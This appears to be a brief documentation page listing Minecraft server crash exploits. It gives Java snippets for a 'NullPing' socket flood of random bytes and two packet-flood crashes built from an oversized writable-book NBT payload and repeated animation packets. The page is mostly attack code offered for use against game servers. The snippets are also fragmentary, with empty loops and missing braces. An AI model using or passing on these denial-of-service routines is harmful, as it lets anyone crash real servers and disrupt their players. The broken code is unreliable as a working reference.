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This page documents the minecraft exploits.


NullPing is just a random bytes sent to the server.

* @author Yooniks
public static void nullPing(final String ip, final int port, final int amount) {
    try {
        final Socket socket = new Socket(ip, port);
        for(int i = 0; i < amount; ++i) {
    }catch (final Exception e) {}


Sending a lot of big packets in a short space time causes netty crash.

* @author Yooniks
public static void sendCrash() {
    try {
        final ItemStack itemStack = new ItemStack(Items.writable_book);
        final NBTTagList pages = new NBTTagList();
        final NBTTagString pageContent = new NBTTagString("3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j3ur903u90f3j");

        for (int i = 0; i < 100; i++) {

        final NBTTagCompound compound = new NBTTagCompound();
        compound.setString("title", "Yooniks idiot XD");
        compound.setTag("pages", pages);

        itemStack.setTagInfo("pages", pageContent);

        mc.thePlayer.sendQueue.addToSendQueue(new C08PacketPlayerBlockPlacement(itemStack));
    }catch (final Exception e) {}


Sending a lot of packets in a short space time, causes that netty can't handle it.

* @author Yooniks
public static void sendCrash() {
    try {
        mc.thePlayer.sendQueue.addToSendQueue(new C0APacketAnimation());
    }catch (final Exception e) {}